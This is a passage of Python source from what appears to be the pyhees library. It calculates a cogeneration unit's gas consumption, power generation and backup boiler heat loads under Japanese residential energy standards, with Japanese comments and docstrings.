"""夜間平均外気温度 (℃) (15)
Args:
Theta_ex_d_t(ndarray): 外気温度 (℃)
Returns:
ndarray: 夜間平均外気温度 (℃)
"""
# 1時間後ろに配列をずらす(そして、12月31日23時を1月1日0時に移動させる)
tmp = np.roll(Theta_ex_d_t, 1)
# ** 1時間ずらしたので、前日23時から当日7時までの代わりに、当日0時から8時までの平均を計算すればよい **
# 8760時間の一次配列を365*24の二次配列へ再配置させる
tmp = tmp.reshape(365, 24)
# 8時~23時を0にする
tmp[:, 8:] = 0
# 配列の2次元目を合算して2次元目を消す
tmp = np.sum(tmp, axis=1)
# 8で割ることで平均化する
Theta_ex_Nave_d = tmp / 8
return Theta_ex_Nave_d
# ============================================================================
# 15. 温水温度の熱負荷
# ============================================================================
def get_L_HWH_d(L_HWH_d_t):
"""1日当たりの温水温度の熱負荷 (MJ/d) (16)
Args:
L_HWH_d_t(ndarray): 1時間当たりの温水暖房の熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの温水暖房の熱負荷 (MJ/d)
"""
# 8760時間の一次配列を365*24の二次配列へ再配置させる
tmp = L_HWH_d_t.reshape(365, 24)
# 二次元目を加算することで二次元目を消滅させる
L_HWH_d = np.sum(tmp, axis=1)
return L_HWH_d
```
#### File: src/pyhees/section8.py
```python
import numpy as np
import pyhees.section4_7 as hwh
import pyhees.section7_1 as dhw
import pyhees.section8_a as spec
import pyhees.section8_d as bb_dhw
import pyhees.section8_e as bb_hwh
from pyhees.section11_1 import load_outdoor, get_Theta_ex
# ============================================================================
# 5. ガス消費量
# ============================================================================
def calc_E_G_CG_d_t(bath_function, CG, E_E_dmd_d_t,
L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t, L_dashdash_b1_d_t, L_dashdash_b2_d_t,
L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t,
H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad):
"""1時間当たりのコージェネレーション設備のガス消費量 (1)
Args:
bath_function(str): ふろ機能の種類
CG(dict): コージェネレーション設備の仕様
E_E_dmd_d_t(ndarray): 1時間当たりの電力需要 (kWh/h)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚の太陽熱補正給湯熱負荷 (MJ/h)
H_HS: param H_MR:
H_OR: param A_A:
A_MR: param A_OR:
region: param mode_MR:
mode_OR: param L_T_H_rad:
H_MR:
A_A:
A_OR:
mode_MR:
L_T_H_rad:
Returns:
tuple: 1時間当たりのコージェネレーション設備の一次エネルギー消費量及び1時間当たりのコージェネレーション設備による発電量
"""
# ----- パラメータの取得 -----
if 'CG_category' in CG:
# 温水暖房への排熱利用
exhaust = spec.get_exhaust(CG['CG_category'])
# 排熱利用方式
exhaust_priority = spec.get_exhaust_priority(CG['CG_category'])
# バックアップボイラー(給湯)の給湯機の効率
e_rtd_DHW_BB = spec.get_e_rtd_BB_DHW(CG['CG_category'])
# バックアップボイラー(給湯、温水暖房)の種類
type_BB_HWH = spec.get_type_BB_HWH(CG['CG_category'])
# バックアップボイラー(温水暖房)の定格効率
e_rtd_BB_HWH = spec.get_e_rtd_BB_HWH(CG['CG_category'])
# バックアップボイラー(温水暖房)の定格能力 (W)
q_rtd_BB_HWH = spec.get_q_rtd_BB_HWH(CG['CG_category'])
# 発電ユニットの給湯排熱利用率
r_DHW_gen_PU_d = spec.get_r_DHW_gen_PU_d(CG['CG_category'])
# 発電ユニットの温水暖房排熱利用率
r_HWH_gen_PU_d = spec.get_r_HWH_gen_PU_d(CG['CG_category'])
# 発電ユニットの発電方式
PU_type = spec.get_PU_type(CG['CG_category'])
# 発電ユニットの発電量推定時の仮想発電量のパラメータ a_PU, a_DHW, a_HWH, b, c
param_E_E_gen_PU_Evt_d = spec.get_param_E_E_gen_PU_EVt_d(CG['CG_category'])
# 発電ユニットの排熱量推定時の仮想燃料消費量を求める係数
param_E_F_PU_HVt_d = spec.get_param_E_F_PU_HVt_d(CG['CG_category'])
# 発電ユニットの排熱量推定時の仮想排熱量の上限比を求める係数 a_DHW, a_HWH, b
param_r_H_gen_PU_HVt_d = spec.get_param_r_H_gen_PU_HVt_d(CG['CG_category'])
# 発電ユニットの日平均発電効率を求める係数 a_PU, a_DHW, a_HWH, b, 上限値, 下限値
param_e_E_PU_d = spec.get_param_e_E_PU_d(CG['CG_category'])
# 発電ユニットの日平均排熱効率を求める係数 a_PU, a_DHW, a_HWH, b, 上限値, 下限値
param_e_H_PU_d = spec.get_param_e_H_PU_d(CG['CG_category'])
# 定格発電出力 (W)
P_rtd_PU = spec.get_P_rtd_PU(CG['CG_category'])
# タンクユニットの補機消費電力 (給湯)
P_TU_aux_DHW = spec.get_P_TU_aux_DHW(CG['CG_category'])
# タンクユニットの補機消費電力 (温水暖房)
P_TU_aux_HWH = spec.get_P_TU_aux_HWH(CG['CG_category'])
# 逆潮流の評価
has_CG_reverse = CG['reverse'] if 'reverse' in CG else False
else:
# 温水暖房への排熱利用
exhaust = CG['exhaust']
# 排熱利用方式
exhaust_priority = CG['exhaust_priority']
# バックアップボイラー(給湯、温水暖房)の種類
type_BB_HWH = CG['type_BB_HWH']
# 付録D,Eより
if type_BB_HWH == 'ガス従来型' or type_BB_HWH == 'G_NEJ':
# バックアップボイラー(給湯)の給湯機の効率
e_rtd_DHW_BB = 0.782
# バックアップボイラー(温水暖房)の定格効率
e_rtd_BB_HWH = 0.82
# バックアップボイラー(温水暖房)の定格能力 (W)
q_rtd_BB_HWH = 17400
elif type_BB_HWH == 'ガス潜熱回収型' or type_BB_HWH == 'G_EJ':
# バックアップボイラー(給湯)の給湯機の効率
e_rtd_DHW_BB = 0.905
# バックアップボイラー(温水暖房)の定格効率
e_rtd_BB_HWH = 0.87
# バックアップボイラー(温水暖房)の定格能力 (W)
q_rtd_BB_HWH = 17400
else:
raise ValueError(type_BB_HWH)
# 発電ユニットの給湯排熱利用率
r_DHW_gen_PU_d = CG['r_DHW_gen_PU_d']
# 発電ユニットの温水暖房排熱利用率
r_HWH_gen_PU_d = CG['r_HWH_gen_PU_d']
# 発電ユニットの発電方式
if 'PU_type' in CG:
# 発電ユニットの発電方式
PU_type = CG['PU_type']
else:
# 付録A コージェネレーション設備の仕様
if CG['CG_category_param'] == 'PEFC':
CG_category = 'PEFC2'
elif CG['CG_category_param'] == 'SOFC':
CG_category = 'SOFC1'
elif CG['CG_category_param'] == 'GEC':
CG_category = 'GEC1'
else:
raise ValueError(CG['CG_category_param'])
PU_type = spec.get_PU_type(CG_category)
# 発電ユニットの発電量推定時の仮想発電量のパラメータ a_PU, a_DHW, a_HWH, b, c
param_E_E_gen_PU_Evt_d = CG['param_E_E_gen_PU_Evt_d']
# 発電ユニットの排熱量推定時の仮想燃料消費量を求める係数
if 'param_E_F_PU_HVt_d' in CG:
param_E_F_PU_HVt_d = CG['param_E_F_PU_HVt_d']
# 発電ユニットの排熱量推定時の仮想排熱量の上限比を求める係数 a_DHW, a_HWH, b
if 'param_r_H_gen_PU_HVt_d' in CG:
param_r_H_gen_PU_HVt_d = CG['param_r_H_gen_PU_HVt_d']
# 発電ユニットの日平均発電効率を求める係数 a_PU, a_DHW, a_HWH, b, 上限値, 下限値
param_e_E_PU_d = CG['param_e_E_PU_d']
# 発電ユニットの日平均排熱効率を求める係数 a_PU, a_DHW, a_HWH, b, 上限値, 下限値
param_e_H_PU_d = CG['param_e_H_PU_d']
# 定格発電出力 (W)
P_rtd_PU = CG['P_rtd_PU']
# タンクユニットの補機消費電力 (給湯)
P_TU_aux_DHW = CG['P_TU_aux_DHW']
# タンクユニットの補機消費電力 (温水暖房)
P_TU_aux_HWH = CG['P_TU_aux_HWH']
# 逆潮流の評価
has_CG_reverse = CG['reverse'] if 'reverse' in CG else False
# ----- 温水暖房用熱源機の負荷および温水供給運転率の計算 -----
if H_HS is not None and H_HS['type'] == 'コージェネレーションを使用する':
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = hwh.get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = hwh.get_Theta_SW_hs_op(type_BB_HWH)
p_hs = hwh.calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = hwh.get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
# 1時間当たりの温水暖房の熱負荷 (MJ/h)
L_HWH_d_t = hwh.calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 処理暖房負荷
Q_T_H_rad = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = hwh.calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = hwh.calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad[i - 1, :] = hwh.calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
# 温水暖房用熱源機の温水供給運転率
r_WS_HWH_d_t = hwh.calc_r_WS_hs_d_t(rad_list, L_HWH_d_t, Q_T_H_rad, Theta_SW_d_t, region, A_A, A_MR, A_OR,
mode_MR)
# 戻り温水温度 (9)
Theta_RW_hs = hwh.calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR,
L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = hwh.get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
else:
L_HWH_d_t = np.zeros(24 * 365)
P_TU_aux_HWH = np.zeros(24 * 365)
r_WS_HWH_d_t = np.zeros(24 * 365)
# 外気温度の取得
outdoor = load_outdoor()
Theta_ex_d_t = get_Theta_ex(region, outdoor)
Theta_ex_Ave = dhw.get_theta_ex_d_Ave_d(Theta_ex_d_t)
# ----- 16. その他 -----
# 1日当たりの温水暖房の熱負荷 (31)
L_HWH_d = get_L_HWH_d(L_HWH_d_t)
# 1時間当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (30)
L_DHW_d_t = get_L_DHW_d_t(L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t, L_dashdash_b1_d_t,
L_dashdash_b2_d_t, L_dashdash_ba1_d_t)
# 1日当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (MJ/d) (29)
L_DHW_d = get_L_DHW_d(L_DHW_d_t)
# ----- 15. タンクユニットの補機消費電力 -----
# 1時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷 (MJ/h) (28)
L_BB_DHW_ba2_d_t = get_L_BB_DHW_ba2_d_t(L_dashdash_ba2_d_t)
# 1時間当たりの浴槽追焚のタンクユニットの補機消費電力量 (kWh/h)
E_E_TU_aux_ba2_d_t = calc_E_E_TU_aux_ba2_d_t(L_BB_DHW_ba2_d_t)
# 1時間当たりの温水暖房時のタンクユニットの補機消費電力量 (kWh/h) (27)
E_E_TU_aux_HWH_d_t = get_E_E_TU_aux_HWH_d_t(exhaust, P_TU_aux_HWH, r_WS_HWH_d_t)
# 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h) (26)
E_E_TU_aux_DHW_d_t = get_E_E_TU_aux_DHW_d_t(P_TU_aux_DHW)
# 1時間当たりのタンクユニットの補機消費電力量 (25)
E_E_TU_aux_d_t = get_E_E_TU_aux_d_t(E_E_TU_aux_DHW_d_t, E_E_TU_aux_HWH_d_t, E_E_TU_aux_ba2_d_t)
print('E_E_TU_aux_ba2_d_t = {} [kWh/yr] (min={}, max={})'.format(np.sum(E_E_TU_aux_ba2_d_t), min(E_E_TU_aux_ba2_d_t), max(E_E_TU_aux_ba2_d_t)))
print('E_E_TU_aux_HWH_d_t = {} [kWh/yr] (min={}, max={})'.format(np.sum(E_E_TU_aux_HWH_d_t), min(E_E_TU_aux_HWH_d_t), max(E_E_TU_aux_HWH_d_t)))
print('E_E_TU_aux_DHW_d_t = {} [kWh]'.format(E_E_TU_aux_DHW_d_t))
print('E_E_TU_aux_d_t = {} [kWh/yr] (min={}, max={})'.format(np.sum(E_E_TU_aux_d_t), min(E_E_TU_aux_d_t), max(E_E_TU_aux_d_t)))
# ----- 14. 発電ユニット -----
# 発電ユニットの電力需要 (kWh/h) (24)
E_E_dmd_PU_d_t = get_E_E_dmd_PU_d_t(E_E_dmd_d_t, E_E_TU_aux_d_t)
# 1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h) (23)
E_E_PU_d_t = get_E_E_PU_d_t(E_E_dmd_PU_d_t, P_rtd_PU, has_CG_reverse)
# 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d) (22)
E_E_PU_d = get_E_E_PU_d(E_E_PU_d_t)
# 発電ユニットの日平均排熱効率 (-) (21)
e_H_PU_d = get_e_H_PU_d(E_E_PU_d, L_DHW_d, L_HWH_d, **param_e_H_PU_d)
# 発電ユニットの日平均発電効率 (-) (20)
e_E_PU_d = get_e_E_PU_d(E_E_PU_d, L_DHW_d, L_HWH_d, **param_e_E_PU_d)
if PU_type == '熱主':
# 発電ユニットの排熱量推定時の仮想排熱量上限比 (-) (19)
r_H_gen_PU_HVt_d = get_r_H_gen_PU_HVt_d(L_DHW_d, L_HWH_d, **param_r_H_gen_PU_HVt_d)
# 1日当たりの発電ユニットの排熱量推定時の仮想燃料消費 (MJ/d) (18)
E_F_PU_HVt_d = get_E_G_PU_HVt_d(e_H_PU_d, L_DHW_d, L_HWH_d, r_H_gen_PU_HVt_d, **param_E_F_PU_HVt_d)
else:
E_F_PU_HVt_d = np.zeros(365)
# 1日当たりの発電ユニットの発電量推定時の仮想発電量 (kWh/d) (17)
E_E_gen_PU_EVt_d = get_E_E_gen_PU_EVt_d(E_E_PU_d, L_DHW_d, L_HWH_d, **param_E_E_gen_PU_Evt_d)
# 1日当たりの発電ユニットの発電量推定時の仮想ガス消費量 (MJ/d) (16)
E_F_PU_EVt_d = get_E_G_PU_EVt_d(E_E_gen_PU_EVt_d, e_E_PU_d)
# 1日当たりの発電ユニットのガス消費量 (MJ/d) (15)
E_G_PU_d = get_E_G_PU_d(PU_type, E_F_PU_EVt_d, E_F_PU_HVt_d)
# 1時間当たりの発電ユニットのガス消費量 (MJ/h) (14a)
E_G_PU_d_t = calc_E_G_PU_d_t(E_G_PU_d, E_E_PU_d, E_E_PU_d_t, e_E_PU_d)
# 発電ユニットの発電量 (kWh/h) (10)
E_E_gen_PU_d_t = get_E_E_gen_PU_d_t(E_G_PU_d_t, e_E_PU_d)
# 1日当たりの発電ユニット排熱量 (MJ/d) (9)
Q_PU_gen_d = get_Q_PU_gen_d(E_G_PU_d, e_H_PU_d)
# 1日当たりの給湯・温水暖房の排熱利用量 (MJ/d) (6)(7)(8)
Q_gen_DHW_d, Q_gen_HWH_d = get_Q_gen_x_d(exhaust, exhaust_priority, Q_PU_gen_d, r_DHW_gen_PU_d, r_HWH_gen_PU_d,
L_DHW_d, L_HWH_d)
print('E_E_dmd_PU_d_t = {} [MJ/yr] (min={}, max={} [MJ/h])'.format(np.sum(E_E_dmd_PU_d_t), min(E_E_dmd_PU_d_t), max(E_E_dmd_PU_d_t)))
print('P_rtd_PU = {}'.format(P_rtd_PU))
print('E_E_PU_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_E_PU_d), min(E_E_PU_d), max(E_E_PU_d)))
print('E_E_gen_PU_EVt_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_E_gen_PU_EVt_d), min(E_E_gen_PU_EVt_d), max(E_E_gen_PU_EVt_d)))
print('e_E_PU_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(e_E_PU_d), min(e_E_PU_d), max(e_E_PU_d)))
print('E_F_PU_EVt_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_F_PU_EVt_d), min(E_F_PU_EVt_d), max(E_F_PU_EVt_d)))
print('E_F_PU_HVt_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_F_PU_HVt_d), min(E_F_PU_HVt_d), max(E_F_PU_HVt_d)))
print('E_G_PU_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_G_PU_d), min(E_G_PU_d), max(E_G_PU_d)))
print('E_G_PU_d_t = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_G_PU_d_t), min(E_G_PU_d_t), max(E_G_PU_d_t)))
print('E_E_gen_PU = {} [MJ/yr] (min={}, max={} [MJ/h])'.format(np.sum(E_E_gen_PU_d_t), min(E_E_gen_PU_d_t), max(E_E_gen_PU_d_t)))
print('Q_PU_gen = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(Q_PU_gen_d), min(Q_PU_gen_d), max(Q_PU_gen_d)))
print('Q_gen_DHW = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(Q_gen_DHW_d), min(Q_gen_DHW_d), max(Q_gen_DHW_d)))
print('Q_gen_HWH = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(Q_gen_HWH_d), min(Q_gen_HWH_d), max(Q_gen_HWH_d)))
# ----- 13. 温水暖房時のバックアップボイラーのガス消費量(温水暖房への排熱利用がある場合)
if H_HS is not None and H_HS['type'] == 'コージェネレーションを使用する':
# 1日当たりの給湯のバックアップボイラーが分担する給湯熱負荷 (MJ/d) (5)
L_BB_HWH_d_t = get_L_BB_HWH_d_t(L_HWH_d_t, L_HWH_d, Q_gen_HWH_d)
# 1時間当たりの温水暖房時のバックアップボイラーのガス消費量 (MJ/h)
E_G_BB_HWH_d_t = bb_hwh.calc_E_G_BB_HWH_d_t(type_BB_HWH, e_rtd_BB_HWH, q_rtd_BB_HWH, L_BB_HWH_d_t, p_hs)
else:
L_BB_HWH_d_t = np.zeros(24 * 365)
E_G_BB_HWH_d_t = np.zeros(24 * 365)
# ----- 12. 給湯時のバックアップボイラーのガス消費量 ----
# 1時間あたりのバックアップボイラーが分担する給湯熱負荷 (4)
L_BB_DHW_d_t, L_BB_DHW_k_d_t, L_BB_DHW_s_d_t, L_BB_DHW_w_d_t, \
L_BB_DHW_b1_d_t, L_BB_DHW_b2_d_t, L_BB_DHW_ba1_d_t, L_BB_DHW_ba2_d_t = \
get_L_BB_x_d_t(L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t,
Q_gen_DHW_d, L_DHW_d)
# 1日当たりの給湯時のバックアップボイラーの燃料消費量 (MJ/d) (3)
E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t = bb_dhw.calc_E_G_BB_DHW_d_t(bath_function,
L_BB_DHW_k_d_t, L_BB_DHW_s_d_t, L_BB_DHW_w_d_t,
L_BB_DHW_b1_d_t, L_BB_DHW_b2_d_t, L_BB_DHW_ba1_d_t, L_BB_DHW_ba2_d_t,
e_rtd_DHW_BB, Theta_ex_Ave)
# ----- 11. 給湯時のバックアップボイラーの年間平均効率 -----
# 給湯時のバックアップボイラーの年間平均効率 (-) (6)
e_BB_ave = get_e_BB_ave(L_BB_DHW_d_t, L_BB_DHW_ba2_d_t, E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t)
# ----- 10. 製造熱量のうちの自家消費算入分 -----
# 1年あたりのコージェネレーション設備による製造熱量のうちの自家消費算入分 (MJ/yr) (5)
Q_CG_h = get_Q_CG_h(L_DHW_d_t)
# ----- 9. 発電量のうちの自己消費分
# 1年当たりのコージェネレーション設備による発電量のうちの自己消費分 (kWH/yr) (4)
E_E_CG_self = get_E_E_CG_self(E_E_TU_aux_d_t)
# ----- 8. 給湯時のバックアップボイラーの年間平均効率 -----
# 1年あたりのコージェネレーション設備のガス消費量のうちの売電に係る控除対象分 (MJ/yr) (3)
E_G_CG_ded = get_E_G_CG_ded(E_G_PU_d_t, E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t)
# ----- 7. 発電量 -----
# 1時間当たりのコージェネレーション設備による発電量 (kWh/h) (2)
E_E_CG_gen_d_t = get_E_E_CG_gen_d_t(E_E_gen_PU_d_t, E_E_TU_aux_d_t)
# ----- 5. ガス消費量 -----
# 1時間当たりのコージェネレーション設備のガス消費量 (MJ/h) (1)
E_G_CG_d_t = E_G_PU_d_t + E_G_BB_DHW_d_t + E_G_BB_HWH_d_t
print('E_G_PU = {} [MJ/yr]'.format(np.sum(E_G_PU_d_t)))
print('E_G_BB_DHW = {} [MJ/yr]'.format(np.sum(E_G_BB_DHW_d_t)))
print('E_G_BB_HWH = {} [MJ/yr]'.format(np.sum(E_G_BB_HWH_d_t)))
print('E_E_CG_gen = {} [kWh/yr]'.format(np.sum(E_E_CG_gen_d_t)))
print('E_G_CG = {} [MJ/yr]'.format(np.sum(E_G_CG_d_t)))
return E_G_CG_d_t, E_E_CG_gen_d_t, E_G_CG_ded, E_E_CG_self, Q_CG_h, E_E_TU_aux_d_t, e_BB_ave
# ============================================================================
# 6. 灯油消費量
# ============================================================================
#
def get_E_K_CG_d_t():
"""1時間当たりのコージェネレーション設備の灯油消費量 (MJ/h)
Args:
Returns:
ndarray: E_K_CG_d_t 1時間当たりのコージェネレーション設備の灯油消費量 (MJ/h)
"""
return np.zeros(24 * 365)
# ============================================================================
# 7. 発電量
# ============================================================================
def get_E_E_CG_gen_d_t(E_E_gen_PU_d_t, E_E_TU_aux_d_t):
"""1時間当たりのコージェネレーション設備による発電量 (kWh/h) (2)
Args:
E_E_gen_PU_d_t(ndarray): 1時間当たりの発電ユニットの発電量 (kWh/h)
E_E_TU_aux_d_t(ndarray): 1時間当たりのタンクユニットの補機消費電力量 (kWh/h)
Returns:
ndarray: 1時間当たりのコージェネレーション設備による発電量 (kWh/h)
"""
return E_E_gen_PU_d_t - E_E_TU_aux_d_t
# ============================================================================
# 8. 給湯時のバックアップボイラーの年間平均効率
# ============================================================================
def get_E_G_CG_ded(E_G_PU_d_t, E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t):
"""1年あたりのコージェネレーション設備のガス消費量のうちの売電に係る控除対象分 (MJ/yr) (3)
Args:
E_G_PU_d_t(ndarray): 日付dの時刻tにおける1時間当たりの発電ユニットのガス消費量 (MJ/h)
E_G_BB_DHW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの給湯時のバックアップボイラーのガス消費量 (MJ/h)
E_G_BB_DHW_ba2_d_t(ndarray): 日付dの時刻tにおける1時間当たりの浴槽追焚時におけるバックアップボイラーのガス消費量 (MJ/d)
Returns:
float64: 1年あたりのコージェネレーション設備のガス消費量のうちの売電に係る控除対象分 (MJ/yr)
"""
return np.sum(E_G_PU_d_t + E_G_BB_DHW_d_t - E_G_BB_DHW_ba2_d_t)
# ============================================================================
# 9. 発電量のうちの自己消費分
# ============================================================================
def get_E_E_CG_self(E_E_TU_aux_d_t):
"""1年当たりのコージェネレーション設備による発電量のうちの自己消費分 (kWH/yr) (4)
Args:
E_E_TU_aux_d_t(ndarray): 日付dの時刻tにおける1時間当たりのタンクユニットの補機消費電力量 (kWh/yr)
Returns:
float64: 1年当たりのコージェネレーション設備による発電量のうちの自己消費分 (kWH/yr)
"""
return np.sum(E_E_TU_aux_d_t)
# ============================================================================
# 10. 製造熱量のうちの自家消費算入分
# ============================================================================
def get_Q_CG_h(L_DHW_d_t):
"""1年あたりのコージェネレーション設備による製造熱量のうちの自家消費算入分 (MJ/yr) (5)
Args:
L_DHW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
Returns:
float64: 1年あたりのコージェネレーション設備による製造熱量のうちの自家消費算入分 (MJ/yr)
"""
return np.sum(L_DHW_d_t)
# ============================================================================
# 11. 給湯時のバックアップボイラーの年間平均効率
# ============================================================================
def get_e_BB_ave(L_BB_DHW_d_t, L_BB_DHW_ba2_d_t, E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t):
"""給湯時のバックアップボイラーの年間平均効率 (-) (6)
Args:
L_BB_DHW_d_t(ndarray): 1時間当たりのバックアップボイラーが分担する給湯熱負荷 (MJ/h)
L_BB_DHW_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷 (MJ/h)
E_G_BB_DHW_d_t(ndarray): 1時間当たりの給湯時のバックアップボイラーのガス消費量 (MJ/h)
E_G_BB_DHW_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時におけるバックアップボイラーのガス消費量 (MJ/d)
Returns:
float64: 給湯時のバックアップボイラーの年間平均効率 (-)
"""
e_BB_ave = np.sum(L_BB_DHW_d_t - L_BB_DHW_ba2_d_t) / np.sum(E_G_BB_DHW_d_t - E_G_BB_DHW_ba2_d_t)
return e_BB_ave
# ============================================================================
# 12. 給湯時のバックアップボイラーのガス消費量
# ============================================================================
# ============================================================================
# 12.1 ガス消費量
# ============================================================================
# 付録D
# ============================================================================
# 12.2 バックアップボイラーが分担する給湯熱負荷
# ============================================================================
def get_L_BB_x_d_t(L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t,
Q_gen_DHW_d, L_DHW_d):
"""1時間あたりのバックアップボイラーが分担する給湯熱負荷 (7)
Args:
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はりにおける太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はりにおける太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽水栓さし湯における太陽熱補正給湯熱負荷 (MJ/h)
Q_gen_DHW_d(ndarray): 1日当たりの給湯の排熱利用量 (MJ/d)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
Returns:
tuple: 1時間あたりのバックアップボイラーが分担する給湯熱負荷(MJ/d)
"""
Q_gen_DHW_d = np.repeat(Q_gen_DHW_d, 24)
L_DHW_d = np.repeat(L_DHW_d, 24)
# (7b)
L_BB_DHW_k_d_t = L_dashdash_k_d_t - Q_gen_DHW_d * (L_dashdash_k_d_t / L_DHW_d)
# (7c)
L_BB_DHW_s_d_t = L_dashdash_s_d_t - Q_gen_DHW_d * (L_dashdash_s_d_t / L_DHW_d)
# (7d)
L_BB_DHW_w_d_t = L_dashdash_w_d_t - Q_gen_DHW_d * (L_dashdash_w_d_t / L_DHW_d)
# (7e)
L_BB_DHW_b1_d_t = L_dashdash_b1_d_t - Q_gen_DHW_d * (L_dashdash_b1_d_t / L_DHW_d)
# (7f)
L_BB_DHW_b2_d_t = L_dashdash_b2_d_t - Q_gen_DHW_d * (L_dashdash_b2_d_t / L_DHW_d)
# (7g)
L_BB_DHW_ba1_d_t = L_dashdash_ba1_d_t - Q_gen_DHW_d * (L_dashdash_ba1_d_t / L_DHW_d)
# (7h)
L_BB_DHW_ba2_d_t = L_dashdash_ba2_d_t
# (7a)
L_BB_DHW_d_t = L_BB_DHW_k_d_t + \
L_BB_DHW_s_d_t + \
L_BB_DHW_w_d_t + \
L_BB_DHW_b1_d_t + \
L_BB_DHW_b2_d_t + \
L_BB_DHW_ba1_d_t + \
L_BB_DHW_ba2_d_t
return L_BB_DHW_d_t, L_BB_DHW_k_d_t, L_BB_DHW_s_d_t, L_BB_DHW_w_d_t, \
L_BB_DHW_b1_d_t, L_BB_DHW_b2_d_t, L_BB_DHW_ba1_d_t, L_BB_DHW_ba2_d_t
# ============================================================================
# 13. 温水暖房時のバックアップボイラーのガス消費量(温水暖房へ排熱利用がある場合)
# ============================================================================
def get_L_BB_HWH_d_t(L_HWH_d_t, L_HWH_d, Q_gen_HWH_d):
